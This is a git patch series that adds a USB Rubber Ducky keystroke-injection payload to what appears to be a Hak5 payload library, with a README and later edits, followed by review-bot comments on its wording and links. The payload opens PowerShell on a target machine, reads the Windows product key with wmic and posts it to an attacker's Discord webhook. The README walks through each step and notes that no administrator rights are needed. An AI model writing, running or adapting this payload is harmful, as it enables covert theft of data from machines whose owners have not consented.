From 6b36c20144da354734296bde96f92254ed512abc Mon Sep 17 00:00:00 2001 From: Aleff Date: Fri, 3 Nov 2023 12:49:19 +0100 Subject: [PATCH 1/3] Exfiltrate Windows Product Key Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook. --- .../payload.txt | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt new file mode 100644 index 0000000..a2a7c7b --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt 
@@ -0,0 +1,59 @@ +REM ################################################### +REM # | +REM # Title : Exfiltrate Windows Product Key | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Exfiltration | +REM # Target : Windows 10-11 | +REM # | +REM ################################################### + + +REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg... +DEFINE #DISCORD-WEBHOOK example.com + +EXTENSION DETECT_READY + REM VERSION 1.1 + REM AUTHOR: Korben + + REM_BLOCK DOCUMENTATION + USAGE: + Extension runs inline (here) + Place at beginning of payload (besides ATTACKMODE) to act as dynamic + boot delay + + TARGETS: + Any system that reflects CAPSLOCK will detect minimum required delay + Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms + END_REM + + REM CONFIGURATION: + DEFINE #RESPONSE_DELAY 25 + DEFINE #ITERATION_LIMIT 120 + + VAR $C = 0 + WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) + CAPSLOCK + DELAY #RESPONSE_DELAY + $C = ($C + 1) + END_WHILE + CAPSLOCK +END_EXTENSION + +GUI r +DELAY 1000 +STRING powershell +ENTER +DELAY 2000 + +STRINGLN_BLOCK + $hookUrl = "#DISCORD-WEBHOOK" + $exfiltration = @" + $(wmic path softwarelicensingservice get OA3xOriginalProductKey) + $(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription) + "@ + $payload = [PSCustomObject]@{ + content = $exfiltration + } + Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit +END_STRINGLN From b358fc582a54038ea27bdfd58c9dbb410e3fcfb2 Mon Sep 17 00:00:00 2001 
From: aleff-github Date: Fri, 3 Nov 2023 12:50:00 +0100 Subject: [PATCH 2/3] README --- .../Exfiltrate_Windows_Product_Key/README.md | 91 ++++++++++++++++++ .../assets/1.png | Bin 0 -> 25861 bytes 2 files changed, 91 insertions(+) create mode 100644 payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md create mode 100644 payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/assets/1.png diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md new file mode 100644 index 0000000..dc6a7e2 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md 
@@ -0,0 +1,91 @@ +# Exfiltrate Windows Product Key + +Through this payload, you can export the key information related to the Windows Product Key, knowing its type and the key itself, using a Discord Webhook. + +No administrator permissions are required to do this, isn't that absurd, right? :-) + +![](./assets/1.png) + +**Category**: Exfiltration + +## Index + +- [Introduction](#exfiltrate-windows-product-key) +- [Note](#note) +- [Dependencies](#dependencies) +- [Settings](#settings) +- [Payload Description](#payload-description) +- [Product Key Types](#product-key-types) +- [Sources](#sources) + +## Note + +Tested on: +- Windows 11 + +## Dependencies + +- Discord Webhook + +## Settings + +This portion of the payload serves as a user-defined configuration section where you should input your Discord Webhook URL. You should replace "example.com" with the actual Discord Webhook URL you want to use. The Webhook URL is the endpoint where your payload will send the acquired information related to the Windows Product Key, as well as its type, for exfiltration to a specified Discord channel or server. It's a crucial part of the payload that connects the data extraction process to your Discord platform for further analysis or actions. + +```DuckyScript +DEFINE #DISCORD-WEBHOOK example.com +``` + +## Payload Description + +Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself. + +At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target. + +The following commands are then executed to obtain the necessary information about the Product Key: + +1. This command retrieves the currently in-use Product Key: + + ```powershell + wmic path softwarelicensingservice get OA3xOriginalProductKey + ``` + +2. This command helps determine the type of key. 
You can refer to the [key types section](#key-types) for more details: + + ```powershell + wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription + ``` + +The acquired information is stored in the `$exfiltration` variable, which is subsequently used to create the `$payload` object. This object is then utilized for exfiltration via a Discord Webhook. + +**Exfiltration**: + +```powershell +Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit +``` + +The `$hookUrl` variable was initialized at the beginning of the payload with the value you need to define before execution. + +## Product Key Types + +When dealing with Windows Product Keys, it's essential to understand the different types and their characteristics: + +- **OEM Keys** (*Original Equipment Manufacturer*): + + **Transferability**: Not supposed to be transferable. These keys are typically tied to the prebuilt PC on which they were originally installed. + **Usage**: Manufacturers use OEM keys to install Windows on new computers. + **Procurement**: OEM keys can sometimes be found at discount key vendors, although their use on different hardware may be challenging. + +- **Retail Keys** (*aka "Full Packaged Product" Keys*): + + **Transferability**: Transferrable. These keys can be moved from one computer to another. + **Cost**: Retail keys are often more expensive, often exceeding $100. + **Hidden Keys**: In some cases, a computer may already have a retail key, perhaps from a previous Windows upgrade. Users might not be aware of this until they check. + +Understanding these key types is crucial when working with Windows Product Keys, as it can impact their use, transferability, and compatibility with different hardware and scenarios. + +*Note: Source of this info [[2](#sources)]* + +## Sources + +- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready +- [2] Is your Windows Product Key transferrable? 
https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3 \ No newline at end of file 
diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/assets/1.png b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/assets/1.png new file mode 100644 index 0000000000000000000000000000000000000000..7bdfb0e23436474664b37d073230e52687461213 GIT binary patch literal 25861
Date: Tue, 12 Dec 2023 08:37:45 +0100 Subject: [PATCH 3/3] Removing the CapsLock Error --- .../Exfiltrate_Windows_Product_Key/README.md | 30 +++++++++++++++---- .../payload.txt | 28 +---------------- 2 files changed, 26 insertions(+), 32 deletions(-) 
diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md index dc6a7e2..9a5d173 100644 --- a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md @@ -17,6 +17,7 @@ No administrator permissions are required to do this, isn't that absurd, right? - [Payload Description](#payload-description) - [Product Key Types](#product-key-types) - [Sources](#sources) +- [Credits](#credits) ## Note @@ -39,9 +40,7 @@ DEFINE #DISCORD-WEBHOOK example.com Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself. -At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target. - -The following commands are then executed to obtain the necessary information about the Product Key: +At the beginning of the payload, the commands are executed to obtain the necessary information about the Product Key: 1. This command retrieves the currently in-use Product Key: @@ -87,5 +86,26 @@ Understanding these key types is crucial when working with Windows Product Keys, ## Sources -- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready -- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3 \ No newline at end of file +- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3 + +## Credits + +

Aleff

+
+ + + + + +
+ + + +
Github +
+ + + +
Linkedin +
+
diff --git a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt index a2a7c7b..770e9c9 100644 --- a/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt +++ b/payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt @@ -12,34 +12,8 @@ REM ################################################### REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg... DEFINE #DISCORD-WEBHOOK example.com -EXTENSION DETECT_READY - REM VERSION 1.1 - REM AUTHOR: Korben - - REM_BLOCK DOCUMENTATION - USAGE: - Extension runs inline (here) - Place at beginning of payload (besides ATTACKMODE) to act as dynamic - boot delay - - TARGETS: - Any system that reflects CAPSLOCK will detect minimum required delay - Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms - END_REM - - REM CONFIGURATION: - DEFINE #RESPONSE_DELAY 25 - DEFINE #ITERATION_LIMIT 120 - - VAR $C = 0 - WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT)) - CAPSLOCK - DELAY #RESPONSE_DELAY - $C = ($C + 1) - END_WHILE - CAPSLOCK -END_EXTENSION +DELAY 2000 GUI r DELAY 1000 STRING powershell
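
Review bot: In the header block of payload.txt ([PATCH 1/3]), `Target : Windows 10-11` claims more than the README added in [PATCH 2/3] supports, which lists only Windows 11 under "Tested on"; make the two agree. In the webhook `REM` line of the same hunk, "i.e." introduces an example, so "e.g." is the word meant.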
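
Review bot: The link `[key types section](#key-types)` in step 2 of "Payload Description" (README.md, [PATCH 2/3]) points at an anchor that does not exist. The heading is `## Product Key Types` and the Index in the same file already links it as `#product-key-types`, so use that target here as well.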
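
Review bot: In the "Payload Description" hunk of README.md ([PATCH 3/3]), the replacement sentence "At the beginning of the payload, the commands are executed to obtain the necessary information about the Product Key:" has no antecedent for "the commands" now that the preceding DETECT_READY sentence is gone. Reword it so it introduces the numbered list that follows, for example "The following commands are executed to obtain ...".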
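
Review bot: In the "Sources" hunk of README.md ([PATCH 3/3]), removing entry `[1]` leaves the list starting at `[2]`. Renumber the remaining entry to `[1]` and update the `[[2](#sources)]` reference in the "Product Key Types" note to match, so the numbering does not suggest a missing source.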
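
Review bot: The payload.txt hunk ([PATCH 3/3]) deletes the whole `EXTENSION DETECT_READY` block and adds `DELAY 2000`, but neither the subject line "Removing the CapsLock Error" nor a `REM` comment records what the error was. Add a short `REM` line next to the new `DELAY` or extend the commit message body so the reason for the change can be recovered from the history.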